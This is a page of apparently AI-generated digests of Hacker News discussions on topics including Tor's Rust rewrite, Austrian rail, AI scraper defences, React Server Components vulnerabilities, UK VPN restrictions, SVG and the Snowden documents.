Hacker News, Distilled

AI powered summaries for selected HN stories.

Page 3 of 13

The Tor Project is switching to Rust

Language choice & “right tool” framing

  • Many commenters support the move if it solves Tor’s real pains, emphasizing “right tool for this project” over “language X is universally better.”
  • Some argue the rationale given (memory safety, maintainability) applies to many network-facing, security-critical apps, not just Tor.
  • Others are tired of “rewrite in Rust” stories, suggesting similar impact could come from profiling, dependency trimming, or refactoring in-place.

Security, memory safety, and Rust vs C

  • Supporters: Tor’s threat model (untrusted data, state-level attackers, long-lived C code) makes memory safety and strong static analysis particularly valuable. Rust’s type system, ownership model, and pattern matching are seen as major wins.
  • Skeptics:
    • Point out Rust still has unsafe, logic bugs, supply-chain risk, and doesn’t replace formal verification.
    • Note Tor’s historical C vulnerabilities don’t show many severe remote exploits; most past issues were logic bugs.
  • Several note Rust’s safety gains are real but often overstated or used as marketing; formal methods (SPARK, CompCert, etc.) still provide stronger guarantees for truly critical components.

Performance and Tor’s slowness

  • Consensus that Tor’s speed is dominated by network and anonymity constraints (multiple hops, TLS, exit bottlenecks), not language choice.
  • A few hope Rust might indirectly help explore new protocol optimizations faster, but expectations of raw speedup are low.
  • Some joking/sarcastic suggestions about reducing hop count are rebutted as destroying anonymity.

Rewrites, Arti, and migration strategy

  • Commenters note this is a multi‑year effort (Arti started ~2020, 1.0 in 2022), not a sudden switch.
  • The rewrite is framed by Tor as necessary because the old C codebase was hard to safely evolve, not as anti‑C rhetoric.
  • Examples from other projects (fish shell, TypeScript, browsers) are used to argue that full rewrites can work if staged and carefully managed.

Ecosystem, tooling, and portability concerns

  • Pro‑Rust points: good library ecosystem, easier to embed as a library, strong Windows support, better ergonomics than legacy C/C++ build systems.
  • Concerns:
    • Heavy dependency trees and npm‑like supply‑chain risk.
    • Compiler/toolchain churn and older/obscure platform support (old macOS, OpenBSD i686, exotic architectures).
    • Fear that Rust will “creep everywhere,” forcing more people to adopt new toolchains.

Alternatives, culture, and hype

  • Some ask “why not Go” (GC, simpler, more devs); others respond that Rust’s low‑level control and C interop fit Tor’s needs better.
  • Several threads lament Rust “cultishness” vs. defenders who see criticism as overblown; broader frustration with industry-wide rewrite/hype cycles recurs.

Tor operations & fingerprinting

  • Practical advice: run relays or bridges instead of exits to avoid legal trouble while helping the network.
  • Separate discussion on browser fingerprinting tools finds Tor Browser (especially with JS off) among the strongest at resisting tracking, though some question test methodologies.

Koralm Railway

Project scale and timeline

  • Koralm Tunnel is ~33 km twin-bore, part of a 130 km line with extensive tunnels and structures, built over ~27 years (1998–2025), with the main tunneling 2008–2020 and recent years spent on fit‑out and testing.
  • Some commenters initially felt 17–27 years “too long” but others stressed the geological and engineering difficulty and long testing/safety phase.

Budget, “within budget” and HN title norms

  • Original estimate (around 2005) was ~€5.5B vs ~€5.9B actual; some call this “within budget” or “slightly over,” others note it’s about 7% higher.
  • Inflation and added sections mean it can be framed as under/over depending on accounting; regardless, many see this as an unusually good outcome for a 20‑year megaproject.
  • A long subthread criticizes the HN submission title for editorializing (“within budget”) when the linked page doesn’t mention costs, invoking HN guidelines. Others argue it’s fair context drawn from other sources and not misleading.

Engineering difficulty and geology

  • Commenters highlight extremely challenging Alpine geology: “about as bad as it gets,” with mixed boring/blasting, fault zones, high depth, elevated rock temperatures (~32–39°C), and substantial safety/ventilation systems.
  • Comparisons with Tokyo’s Toei Oedo line and other tunnels emphasize that metro projects in uniform alluvial soils are not directly comparable to deep Alpine base tunnels.

Travel impact and network context

  • The new line cuts Graz–Klagenfurt travel from ~3 hours to ~45 minutes by avoiding detours through narrow valleys and many intermediate stops.
  • Together with the Semmering Base Tunnel, it will significantly shorten Vienna–Graz/Klagenfurt trips.
  • Some users share personal excitement, having followed the project since childhood.

EU funding, signage, and politics

  • Noted EU co‑funding sparks debate on “funded by EU” billboards: design inconsistency annoys some, others defend minimalist, cheap communication.
  • Signs are intended to make EU benefits visible; effectiveness is debated, referencing Brexit regions that were major beneficiaries.
  • Discussion touches on Austria as a net EU contributor, but with political and planning benefits from EU‑level funding decisions.

Rail culture, pricing, and comparisons

  • Several compare Austria’s competent, relatively on‑time, on‑budget rail building to the UK’s HS2, US “Big Dig,” California HSR, and Canadian light rail cost overruns and delays.
  • Austrian trains are seen as culturally central, comfortable, and generally preferred over buses, though single intercity tickets can be expensive without passes.

Young journalists expose Russian-linked vessels off the Dutch and German coast

Perceived (In)Competence of German/EU/NATO Response

  • Several commenters see the German state as amateurish and passive, with “symbolic” ship inspections and no visible countermeasures, eroding trust in defense.
  • Others argue intelligence services almost certainly know about the vessels and drones; the real issue is political decision-making, not information gaps.
  • Suspected reasons for restraint: fear of legal blowback under maritime law, desire to avoid escalation, or using the “Russian scare” for EU/NATO integration or domestic politics.
  • Some extend responsibility to NATO and the US, noting US troops on European soil and suggesting Washington may be pushing de‑escalation.

Why Not Just Seize Ships or Shoot Down Drones?

  • Strong debate over practicality and legality:
    • Shooting drones over populated areas risks debris and stray fire; many countries until recently lacked clear legal authority to down drones that aren’t an immediate kinetic threat.
    • Examples cited of Dutch firing on drones and new German laws to enable police/military action, but implementation is seen as slow.
  • Technically, many drones fly fast and high; ground fire is ineffective except at short range. Interceptor drones, radars, and jamming are seen as the real solution but not yet widely deployed.
  • Some insist ships in international waters could be boarded by special forces, citing other tanker seizures; others emphasize legal and political complications and escalation risks.

Threat Perception: Real Danger vs “Fear-Mongering”

  • Eastern European voices (notably from Poland) describe feeling already under hybrid attack (drones, propaganda, online hate campaigns), and frustrated by “lukewarm” Western support for Ukraine and continued EU payments for Russian energy.
  • Some Western Europeans admit earlier naïveté about Russia post–Cold War and express shame at limited aid, but still back NATO/EU as the “lesser evil.”
  • Others suspect the drone issue is being exaggerated for domestic agendas, likening it to UFO panics or Cold War submarine scares, and argue Russia’s conventional capabilities look underwhelming.

OSINT, Journalism, and Policy Impact

  • The young journalists/OSINT work is widely praised as “legendary” and evidence that open‑source methods can track shadow fleets.
  • Many assume agencies already had this data; the article is seen as exposing public–political gaps rather than discovering unknown threats.
  • Several commenters doubt it will change EU policy quickly, given slow legislative processes and a perceived tendency toward symbolic financial measures (e.g., asset freezes) instead of rapid hard-security actions.

Guarding My Git Forge Against AI Scrapers

AI Data Poisoning & Information Warfare

  • Several comments explore the idea of deliberately poisoning LLM training data (e.g., esoteric languages, insecure code) to bias models or degrade their usefulness.
  • People reference claims that relatively small poisoned datasets can impact models, and that state actors are already “LLM grooming” via propaganda.
  • Others push back on specific journalism about Russian disinformation, arguing the cited article lacks evidence and over-villainizes entire nations; some counter that Russia’s behavior largely fits that description.
  • There is general agreement that nation-state information ops exist, but details and scale are contested or seen as unclear.

Scraper Behavior, Inefficiency, and Motives

  • Multiple self-hosters report scrapers hammering every blame/log view and repeating it frequently, suggesting naïve recursive crawlers with heavy parallelization.
  • Comments note most bots just follow links via HTTP, don’t use git clone, and often ignore robots.txt; optimization is rare because bandwidth and compute are externalized costs.
  • Some suggest many operators are “script kiddies” or spammer-like actors chasing quantity, not quality; others speculate some abusive traffic may not even be for AI training but for generic data resale or anti-decentralization incentives.

Defensive Techniques

  • Config toggles: Gitea’s REQUIRE_SIGNIN_VIEW=expensive is praised as cutting AI traffic and bandwidth drastically while still allowing casual browsing; full login-only modes or OAuth2 proxies for heavy repos also work well.
  • Network controls: putting forges behind Wireguard/Tailscale VPNs, IP/ASN or country-level blocking (especially for non-global audiences), and HTTP/2 requirements are common patterns; people warn about false positives (e.g., travelers, Starlink).
  • Fingerprinting: JA3/JA4 TLS fingerprints, TCP header quirks, and browser-like headers help distinguish many bots from real users; residential proxies and SIM-based botnets complicate this.
  • Architectural fixes: static git viewers (stagit, rgit, custom static sites) served by simple HTTP servers, or throttling via reverse proxies, dramatically reduce load.
  • “Punitive” responses: tools like Anubis or Iocaine that serve garbage/mazes to suspected bots have reportedly slashed traffic from hundreds of thousands of hits/day to a tiny fraction.

Ethics, Net Neutrality, and the “Free Web”

  • Several distinguish respectful, mutually beneficial scraping (e.g., search indexing) from abusive AI scraping that behaves like a slow DDoS and diverts users to regurgitated content without attribution or compensation.
  • Some argue “the web should be free for humans,” but bots abusing that norm justify technical barriers—framed as a “paradox of tolerance” moment.
  • Others worry that rising abuse is pushing hobbyist and small sites off the public internet and into VPN-only or heavily walled-garden setups, undermining the original borderless ideal.

Legal / Contract Proposals

  • Ideas like EULAs billing “non-human readers” or forcing model source-code disclosure are floated, but replies broadly agree these are unenforceable: bots hide behind fake UAs, foreign IPs, and lack any practical mechanism for collection or jurisdiction.

Personal Impact & Sentiment

  • Many self-hosters describe depressing bot:human ratios (often 95%+ bots), fans spinning from pointless traffic, and services shut down or locked away as a result.
  • There is a sense of attrition: keeping a small public forge open increasingly means fighting large-scale scraping operations with far more resources.
  • A brief ad hominem jab at the blog author’s identity is countered by others as irrelevant to the technical validity of the article.

Google de-indexed Bear Blog and I don't know why

Google’s Power and Centralization

  • Several comments relate the de-indexing story to broader concerns that Google effectively decides which businesses and voices survive online.
  • Google Maps is cited as having displaced TripAdvisor and local review sites; some share personal experiences of Google wiping out competitors by absorbing their data.
  • Others argue centralization is “efficient” due to network effects and user laziness, while critics say this is really just monopoly power disguised as efficiency.

Declining Search Quality and Opaque Indexing

  • Many report random de-indexing or deep demotion of sites (blogs, shops, even very large sites) with no clear explanation from Search Console.
  • Complaints include misclassified duplicate content, missing pages in specific regions, and inconsistent indexing between Google and Bing.
  • Search results are described as increasingly polluted with spam, fake products, and auto-translated content (notably Reddit), with some saying Google has neglected search in favor of ads and AI.

Speculated Technical Causes of De‑indexing

  • Hypotheses include: invalid RSS triggering hidden spam heuristics; canonical URL confusion; duplicate content via reverse proxies; sitemap structure/size issues; Unicode-heavy URLs; and odd 301/304 caching interactions.
  • Some note Google’s recent change in how it counts impressions/clicks, suggesting methodological shifts may also impact visibility.
  • Several point out that false positives are inevitable in large anti-spam systems, but the lack of diagnostics or support makes recovery guesswork.

Spam, Negative SEO, and Abuse Patterns

  • One detailed case describes attackers using a site’s search page: spammy queries get echoed in H1/title, Google crawls those URLs, and the site is reclassified as scammy until search pages are noindexed.
  • Commenters mention similar tricks (fake support numbers, reputation management “hacks”) and describe this as a form of negative SEO.

Alternatives: P2P, Law, and Coping Strategies

  • Some call for a P2P, RSS-like, or webring-based discovery layer; others respond that such tech exists but lacks adoption.
  • A strong thread argues this is fundamentally a political/antitrust problem that should be tackled by breaking up Google, while skeptics cite laws like the DMCA as evidence governments often worsen concentration.
  • A few rely on mailing lists or other media and deliberately de-index themselves, but most acknowledge heavy dependence on Google and the fragility this creates.

CRISPR fungus: Protein-packed, sustainable, and tastes like meat

Environmental impact & economics vs chicken

  • Some see gene-edited fungal protein as clearly greener than industrial chicken and cell-cultured meat, and hope economics will follow.
  • Others argue backyard chickens on scraps and bugs can be extremely low-impact, but multiple replies stress this is negligible at global scale; most chicken is from huge intensive operations.
  • Back-of-envelope estimates show that matching US per-capita chicken consumption would require substantial backyard flocks, feed inputs, and regulatory overhead; disease risk might increase with “every yard has chickens.”
  • Industrial chicken’s extremely low cost is tied to specialized breeds (e.g., Cornish cross), rapid growth (6–7 weeks), cheap feed, and scale; home production tends to only break even vs premium organic, never vs discount supermarket chicken.

Technology, biology, and safety

  • The edited fungus is the same species used in Quorn. CRISPR is used for gene knockouts (e.g., chitin synthase) rather than adding foreign genes, leading some to note it might be treated more leniently than classic GMOs in the EU.
  • Thinner cell walls and lower chitin may improve digestibility. Replacing poultry with fungal protein could reduce avian flu risk and antibiotic use, and outbreaks in bioreactors are easier to control than in live animals.
  • A key technical constraint: single-cell protein tends to have high nucleic acid content, which can cause excess uric acid. Heat treatments to reduce this can damage cells and cut yields (~35% reported), though waste streams might be repurposed as fertilizer.
  • Discussion links this to gout, genetics, and the broken human urate oxidase pathway; some wonder why such species-level defects aren’t more aggressively targeted by medicine.

Climate, livestock, and AI datacenters

  • A subthread contrasts emissions from livestock vs data centers. Cited figures: livestock at ~10–20% of global GHGs vs data centers at <0.3%, suggesting small cuts in meat out-emissions large cuts in compute.
  • Others push back on framing, arguing both should be scrutinized; some see “AI vs cows” as a distraction from industrial agriculture’s outsized footprint (deforestation, animal welfare).

Health, “ultra-processed,” and diet

  • Several worry that fungal meat analogs will be lumped into “ultra-processed foods.” Some argue that category meaningfully tracks worse health outcomes; others say it’s mostly correlation and confounds, and that processing per se isn’t inherently bad.
  • There’s debate over whether the UPF narrative is being weaponized (possibly by incumbents) against novel, engineered protein sources.

Taste, culture, and acceptance

  • Some vegetarians say they no longer desire meat and prefer good vegetable-based cuisines; others, even long-term vegetarians, still crave burgers or wings and welcome convincing substitutes.
  • It’s noted that for most buyers, familiar frames like “chicken nuggets” matter more than novel foods, and that much “meat flavor” is actually sauce and seasoning.
  • There is curiosity about inventing entirely new, delicious flavor/texture experiences, but replies point out constraints: taste receptors are fixed; most novelty comes from aroma chemistry, texture, and cultural conditioning.

Ethics, politics, and IP

  • A few see advances like this as removing any remaining “excuse” to kill animals; others argue most people simply don’t share that moral view.
  • Some speculate farm lobbies will try to restrict such products once they threaten poultry; others note farmers might welcome selling feedstock to stable, biosecure fermentation operations.
  • Concerns are raised about licensing and patents: chickens don’t carry CRISPR license fees, while GMO seeds already do; gene-edited animals might eventually be similarly locked up.

Skepticism and alternatives

  • One commenter suspects this is partly investor hype built on a previously underwhelming product class (fungal meat substitutes), but others point out that brands like Quorn are already widely sold.
  • Alternative protein ideas like “air protein” (gas-fed microbes) and mushroom foraging are mentioned as parallel or complementary approaches.

Nokia N900 Necromancy

Nostalgia and real-world use

  • Many share strong affection for the N800/N810/N900/N9 era: first “real” pocket computers, formative Linux-learning devices, and all‑time favorite phones.
  • Common memories: Bluetooth tethering to dumb phones, hunting Wi‑Fi on campus, using Google Voice to dodge SMS fees, running Apache/Python or webservers, hosting WebSocket demos, and even doing academic work (e.g., hypervisors, emulators) on them.
  • The N900 is repeatedly praised for its slide‑out keyboard, FM transmitter, IR blaster, offline maps, stereo speakers, kickstand, and Debian‑based Maemo with apt‑get.

Hardware mods, batteries, and power

  • Some argue the article’s battery hack is overkill when BL‑5J replacements are still sold; others distrust “OEM/genuine” claims for 16‑year‑old packs.
  • Explanation of the supercapacitor approach: old Li‑ion cells develop high internal resistance, making them poor transient current buffers; large caps restore stable voltage under load for always‑powered use.
  • Side discussions on BL‑5J as a nice project form factor and on quirks like N810’s inability to recover from a fully drained battery over USB alone.

2G/3G shutdown and legality of DIY base stations

  • Several note that N900‑class devices are losing phone functionality as 2G/3G are phased out, with timelines varying by country; some links and claims conflict, and details are labeled “messy” or outdated.
  • Running one’s own 2G/3G cell is discussed: technically possible (especially for 2G) but generally illegal or tightly constrained because spectrum has been reallocated.

Nokia, Maemo/Meego, and missed opportunities

  • Strong sentiment that Nokia “had it” early: internet tablets from 2005, Linux phones, Skype + webcams years before iPhone/Android maturity.
  • Multiple accounts say operators feared open Linux devices; Nokia obeyed carrier demands (e.g., limiting telephony, Skype), while Apple forced operators to accept its terms and bypassed SMS/MMS economics.
  • Debate over whether betting on Linux vs Symbian was a mistake: some blame the OS choice, others say UX and corporate structure mattered far more.
  • Many attribute the platform’s death to internal politics and the later Microsoft pivot (Elop, Windows Phone), not technical inferiority.

Desire for modern successors and hacker ethos

  • Ongoing longing for a modern N900‑like “pocket cyberdeck” with keyboard and real Linux. Existing options mentioned: PinePhone, Librem 5, Sailfish/Jolla devices, Fxtec/Planet/GPD, but none are seen as a true successor.
  • Skepticism about commercial viability: niche demand (HN “weirdos”) vs mass‑market expectations and banking apps tied to Android/iOS.
  • One thread explores how to gain the skills behind such hacks: advice centers on gradual tinkering (Arduino/Raspberry Pi/RISC‑V, Gentoo, embedded work) and accumulating experience rather than any single formal path.
  • A few extrapolate to a future split between tightly attested, locked‑down mainstream devices and a “cyberpunk” parallel web of rooted, owner‑controlled hardware—where N900‑style freedom is the ideal.

Ensuring a National Policy Framework for Artificial Intelligence

Scope and Legality of the Executive Order

  • Order aims to block or weaken state-level AI regulation and push toward a single national framework.
  • Several commenters note the article originally lacked policy details; link was later updated to the EO text.
  • Many argue an EO cannot by itself preempt state law; it can only direct executive-branch behavior and litigation strategy.

Federal vs. State Authority and Preemption

  • Strong focus on the Commerce Clause, with some saying AI clearly falls under interstate commerce and thus federal jurisdiction.
  • Others reply that preemption requires an actual act of Congress, not an EO, and that Congress explicitly declined to pass such a moratorium on state AI laws.
  • A congressional research brief on federal preemption is shared as context; some call the EO an attempt at “executive preemption.”

Use and Abuse of Executive Power

  • Commenters note Trump’s heavy use of EOs and compare counts across recent presidents.
  • One camp sees this as governing “by fiat” because he can’t or won’t work with Congress.
  • Another argues presidents naturally use any power they can; the deeper issue is whether the courts and Congress will enforce limits.
  • Some expect the Supreme Court’s recent doctrines limiting agency power to eventually curb broad executive action.

States’ Rights and Partisanship

  • Many point out the irony of a party that rhetorically favors “small government” and “states’ rights” now centralizing AI policy.
  • Historical arguments surface (Civil War, 14th Amendment, Wickard v. Filburn) to show long-term erosion of robust state experimentation.

Corruption, Lobbying, and Oligarchy

  • Multiple comments describe the EO as nakedly serving large tech firms and donors, likening the arrangement to tribute or bribery rather than ordinary lobbying.
  • Some see this as another step toward oligarchic or “Russian-style” politics, with policy shaped directly by billionaire interests.

AI, Innovation, and Labor

  • Supporters say a uniform, light-touch national regime is necessary to keep the U.S. ahead in AI and to avoid a patchwork of restrictive state laws.
  • Critics worry the order strips already-weak guardrails and accelerates harmful deployment (“paperclip”–style fears).
  • There’s a debate over whether AI-driven productivity will benefit workers:
    • One side: more automation → higher productivity → higher wages and wealth.
    • Other side: recent decades show productivity gains accruing mainly to capital; AI may deepen inequality and hollow out the middle class.

Public Opinion and Political Context

  • Some argue Trump is politically weak and AI is broadly unpopular, so enacting binding federal law will be difficult.
  • Others contest claims about his popularity with conflicting polling interpretations.
  • A minority of commenters explicitly welcome the EO as a needed brake on “anti-AI” state movements.

Denial of service and source code exposure in React Server Components

Security impact and patching

  • React disclosed new RSC vulnerabilities: denial of service and source code exposure in the server components protocol.
  • The new issues affect the patches from the previous week; projects that already upgraded must upgrade again.
  • Some note npm audit and GitHub advisories lag behind, so tools may say “no issues” while upgrades are still required.
  • There’s debate over messaging: some see the “follow‑up CVEs are common” line as defensive perception management; others view it as reasonable context.
  • Several commenters question why the DoS issue is rated more severe than source code exposure, arguing breaches are usually worse than downtime.

Concerns about RSC design and security model

  • Many criticisms center on RSC blurring client/server boundaries, making it hard to know what runs where and how data flows.
  • RSC requires a custom deep (de)serialization/RPC protocol, seen as opaque and risky, especially given JavaScript’s dynamic features (prototypes, Function from string, Promise hijacking).
  • Some argue these bugs validate earlier worries that tightly coupling client and server in one codebase is an architectural foot‑gun that will keep surfacing vulnerabilities.
  • Others stress that the main problems so far are in the serializer, not in static client/server separation, and claim the surface area is now relatively fixed.

React/Next complexity, docs, and developer experience

  • Multiple people say RSC and the Next.js App Router dramatically increased complexity compared to the older Pages router or classic SPA setups.
  • Complaints include: unclear execution environment, awkward constraints, difficulty debugging, and an “impenetrable” codebase with heavy vendoring.
  • There’s frustration with React’s documentation pace and Next’s tendency to expose experimental React features as “the new standard.”
  • Some, however, report great productivity with RSC/App Router, appreciating the ability to avoid REST/GraphQL layers and write “URL → HTML” directly.

Architectural philosophy and alternatives

  • A large contingent calls for returning to clearer separations: server-rendered HTML (Rails, Laravel, Django, etc.) plus light JS or JSON APIs for SPAs.
  • Others defend server‑driven UI (e.g., Phoenix LiveView, Blazor, Hotwire, Inertia) as reducing duplication and client/server drift, at the cost of latency and server resources.
  • There’s recurring criticism that React/Next/Vercel are driven by ecosystem lock‑in and hosting incentives, not just technical merit, while Meta itself does not yet use RSC.
  • Many suggest simpler stacks—traditional SSR, htmx, Inertia.js, Vue/Svelte, Remix/TanStack, or plain SPAs—as safer, more understandable defaults for most apps.

UK House of Lords attempting to ban use of VPNs by anyone under 16

Status and legislative context

  • The VPN ban is a single amendment from three members of the House of Lords, not government policy yet.
  • Commenters explain that the Lords can propose and delay but the elected Commons has primacy; many amendments die in this back‑and‑forth.
  • Some ask whether this is “fringe whackjobs” or a real threat; others note similar “fringe” ideas have a habit of returning until something passes.

Stated goals vs perceived motives

  • Officially the driver is child protection, extremism, and enforcing previous online‑safety laws that are easily bypassed via VPNs.
  • Many see “think of the children” as a pretext to:
    • De‑anonymize the internet via mandatory age verification and digital ID.
    • Restore government and legacy‑media control over information and narrative.
    • Expand already‑active UK speech policing.

Free speech, extremism, and UK norms

  • Several posts argue the UK is already arresting thousands per year over online communications, blurring lines between threats, hate speech and political dissent.
  • Others counter that many such cases involve explicit incitement or threats and that the numbers and framing are exaggerated.
  • Tension is noted between US‑style absolutist free speech and UK/European traditions where “offensive” or extremist speech is more regulable.

Technical feasibility and circumvention

  • Commenters highlight trivial workarounds: Tor, free VPNs, SSH tunnels, foreign eSIMs, laptops vs phones, and “family” VPN accounts.
  • This leads to fears of an inevitable ratchet: if VPN bans fail, pressure will grow to restrict SSH, open Wi‑Fi, DNS, and even general‑purpose computers.

Digital ID, CSAM scanning, and surveillance trajectory

  • The proposal is tied to UK digital ID capabilities that let third parties verify attributes, seen as a backbone for universal age‑gating.
  • A separate clause requiring “tamper‑proof” anti‑CSAM system software on devices alarms people more than the VPN ban: it implies mandatory, unremovable on‑device surveillance and a legal attack on user‑controlled operating systems.
  • This is linked to Apple’s earlier CSAM‑scanning design and to similar pushes in Australia, Brazil and the EU; many see a coordinated Western trend toward 1984‑style monitoring, facial recognition, and “social credit”‑like control.

Alternatives and internal disagreements

  • Some support strong restrictions on kids’ social media but oppose identity‑linked enforcement, suggesting:
    • Age‑graded domains/TLDs and ISP‑level child VLANs.
    • Privacy‑preserving, attribute‑only digital credentials.
    • More parental education and device‑level controls rather than criminalisation.
  • Others argue that any such infrastructure is inherently ripe for abuse and that the only sustainable answer is cultural: media literacy, parenting, and accepting that the “optimal amount of crime is non‑zero.”

My productivity app is a never-ending .txt file (2020)

Appeal of the single text-file system

  • Many commenters report using similar systems for years or decades: one long .txt per job, per project, per month, or per week.
  • People value how fast it is to “just type” with essentially zero latency or UI friction, and no need to think about structure before capturing a thought.
  • Several say they rarely revisit old notes; the main benefit is thinking while writing and having a short-term “working memory” for the last days or weeks.

Simplicity, portability, and longevity

  • Plain text is praised for: zero dependencies, maximal portability, backup/version-control friendliness, and being outage-proof.
  • Moving away from proprietary tools like OneNote is described as painful, reinforcing the value of open formats.
  • Some note that a text editor is unlikely to “break” with OS updates, unlike a custom app.

Discipline and habits vs the tool

  • Multiple comments argue the real “productivity hack” is the daily habit of rewriting/curating the list, not the format.
  • Others admit they’d abandon such a system quickly, or get overwhelmed as files grow, and express envy of those who can maintain it.

Variations on the basic idea

  • Common patterns:
    • Rotating files (daily/weekly/monthly/quarterly) to keep size manageable.
    • Using YAML or org-mode for lightweight structure and time-based views.
    • AutoHotkey/bash helpers to insert dates, open the right file, or create date-based folders.
    • Some prepend new entries at the top; others append and periodically archive.

Access, search, and AI/LLMs

  • Mobile access is a recurring pain point: huge files lag on phones, and Dropbox/iCloud flows can be clumsy.
  • Suggestions range from simple grep/Hyperestraier to local LLM assistants that auto-extract metadata, summarize, or answer natural-language queries over the text.

Alternatives: apps and analog systems

  • Many describe different “final resting places” after bouncing between tools: Obsidian, Notesnook, OneNote, Google Keep/Docs, Amplenote, tasks.org, spreadsheets, calendars, Reminder apps, Joplin, Notion-like tools.
  • Others prefer paper notebooks, loose sheets, or “note to self” chats, often with a weekly carry-over of remaining tasks.

Broader reflections

  • Several tie this to a larger preference for plain text and minimal, durable tools over complex, trend-driven productivity apps, with debate about how much modern software has truly improved on older tech.

An SVG is all you need

Interactive power of SVG + JS

  • Many comments highlight that SVG plus embedded JavaScript and CSS can recreate much of what Flash once did (keyboard/mouse interaction, audio, animations).
  • Examples mentioned: interactive CNC assembly diagrams, a chess engine running entirely inside an SVG, SVG-based dashboards, a barbecue controller UI, a music game, a dance–blocking/choreography tool, SCADA-style monitors, and decorative/animated wallpapers.
  • SVG is treated as part of the DOM: scripts inside an <svg> behave like in normal HTML, enabling D3, Observable Plot, and other libraries for rich data visualization and research figures.

Tooling, authoring, and workflows

  • Designer tools already output SVG; some people generate SVG via Python for charts or build apps that emit SVG from code.
  • There’s experimentation with LLMs to manipulate SVG or compress QR-code SVGs, though some doubt current models handle complex SVG well.
  • New tools appear for markdown-to-SVG and for interactive research sites that reproduce paper figures in the browser.
  • Others note pain points: limited editors (especially on Linux), difficulty handling transforms and path extraction, and a desire for better, Word-like editors for HTML/SVG “documents.”

Portability, compatibility, and longevity

  • A key positive: a 20‑year‑old SVG still renders and remains interactive in modern browsers, which is seen as strong evidence of spec stability.
  • At the same time, people report real-world issues: Safari rendering bugs, lack of support in Slack, iOS native apps, email clients, and many Open Graph preview contexts.
  • SVG is praised for crisp scaling, but fonts and text are tricky: no native text wrapping, awkward or heavy font embedding, and inconsistent rendering across renderers.

Performance and complexity tradeoffs

  • Some report SVG becoming slow or memory‑hungry with many elements (dense maps, QR codes, chess grids, complex diagrams), and note that canvas/WebGL can be more efficient.
  • Others say they’ve built complex animations with hundreds of elements that perform fine, arguing that bad performance is usually in how it’s used.
  • There’s debate over whether SVG is suitable for highly interactive scientific environments, with disagreement on how “complex” it can get before frame rates suffer.

Security and sanitization

  • Inline SVGs can embed scripts and external references, triggering security reviews.
  • Suggested mitigations: strong Content Security Policy for served SVGs, sandboxing on separate domains, and sanitization tools (DOMPurify, svg-hush).
  • A linked write-up frames SVG as a significant attack surface; some respondents counter that CSP and proper handling largely address this.

Accessibility and document-format debates

  • Several comments worry that SVG-heavy content is not easily accessible to visually impaired users or keyboard-only users, especially for interactive charts.
  • There’s discussion of whether “one self-contained SVG per paper” is overkill compared to HTML+JS, notebooks, or PDFs with limited interactivity.
  • SVG is seen as a poor drop‑in replacement for PDF due to multi-page, printing, encryption, and strict layout needs, though others compare it favorably to PostScript-era programmable documents.

Going Through Snowden Documents, Part 1

Extent and Nature of Surveillance

  • Central dispute: does bulk interception of communications mean “everyone is surveilled”?
    • One side: if communications/metadata are captured, stored, and searchable, that is surveillance, regardless of whether a human ever “looks” at it; it creates chilling effects and enables retroactive targeting.
    • Other side: bulk collection is a capability; unless you become a specific “target of interest” and your records are queried/analysed, you’re not meaningfully being surveilled.
  • Debate over terminology: intelligence officials have defined “intercept” as requiring human cataloguing, leaving machine-only processing outside the formal definition.
  • Some argue the entire purpose of mass collection is to algorithmically decide who becomes a target.

Feasibility and Infrastructure

  • Long back-and-forth about whether US intelligence agencies can realistically “collect it all.”
    • Skeptics call NSA infrastructure “toy-sized” compared to global data center capacity, arguing full capture of US-person communications is economically/physically impossible.
    • Others counter with the Utah Data Center specs, data deduplication, compression, and comparisons to the Internet Archive to claim large-scale, long-term storage of world internet traffic (at least metadata/unique traffic) is plausible.
  • William Binney and programs like Stellar Wind are cited as evidence of domestic mass collection; Binney’s later public behavior leads some to question his credibility.

Snowden: Whistleblower or Traitor?

  • Strong split:
    • Supporters see him as exposing illegal, “treasonous” mass surveillance; blame the government for betraying public trust.
    • Critics say he violated lawful trust, harmed national security, and should “face trial”; some depict his motives as personal grievance.
  • Disagreement over his exile in Russia:
    • One view: he “chose” an adversary and became part of its information strategy.
    • Counterview: the US cancelled his passport mid-transit, effectively forcing him to accept Russian asylum.
  • Concerns raised about secret courts, “secret law,” and whether he could ever get a fair public trial.

Impact on Trust, Policy, and Public Apathy

  • Several commenters argue Snowden’s revelations were historically huge, yet led to little reform; surveillance has since expanded and been normalized.
  • Wyden–Daines Amendment (failed by one Senate vote) is cited as proof that even modest warrant protections for web/search history couldn’t pass.
  • Some worry the leaks fed general distrust in institutions and helped pave the way for later populist politics; others say economic factors (e.g., 2008 crisis) mattered more and most Americans barely remember Snowden.
  • Frustration with public apathy: calls to treat privacy-violating organizations like major polluters or tobacco companies—through exposure, shaming, and legislation.

Media, Fiction, and “Conspiracy” Framing

  • Films and TV (“Enemy of the State,” X-Files, Clancy novels, Stargate, etc.) seen by some as eerily prescient or even deliberate “pressure release valves” that normalize or discredit real capabilities by embedding them in fiction.
  • Others argue conflating 1990s-style grand conspiracies (assassinations of US citizens, omniscient panopticons) with the Snowden docs is misguided; those leaks showed serious abuses, but not the cinematic extremes.

Meta: Missing Docs, HN Culture, and Bots

  • Question why most Snowden documents remain unreleased and why journalists largely stopped publishing them.
  • Some see this thread’s anti-Snowden sentiment as indicative of HN’s alignment with government/contractor interests, or as driven by bots and coordinated propaganda.
  • Others note that both “Snowden as pure hero” and “Snowden as pure villain/Russian asset” narratives are oversimplifications; the situation is inherently dual: both clear whistleblowing and clear lawbreaking.

Rivian Unveils Custom Silicon, R2 Lidar Roadmap, and Universal Hands Free

Custom Silicon & Autonomy Strategy

  • Many see Rivian’s custom chip as a bold but risky “build vs buy” move given the cost, lead time, and Rivian’s ongoing cash burn.
  • Supporters argue:
    • Automotive-grade, power‑efficient compute with long lifetimes is a niche COTS doesn’t fully satisfy.
    • Owning the stack (chips + software) could become a lucrative B2B platform, especially after the VW deal.
  • Skeptics counter:
    • Nvidia, Qualcomm, etc. already sell strong automotive silicon (Orin, Thor).
    • Volume, iteration speed, and tailoring from those vendors may beat a bespoke ASIC economically.
    • This looks to some like an “AI hype” side quest instead of focusing on getting $40k R2s out profitably.

Rivian Software Quality

  • Owners report sharply mixed experiences: some say their trucks are rock-solid; others describe severe bugs (doors not opening, UI misfires, unusable mobile app).
  • The fact that a major legacy OEM paid billions for this stack is viewed as either a huge validation or an indictment of how bad incumbent software must be.

Lidar: Capability & Safety Debates

  • Thread dives deep into lidar types:
    • 905 nm vs 1550 nm wavelengths, camera damage vs eye safety, and differences in how eyes vs lenses interact with IR.
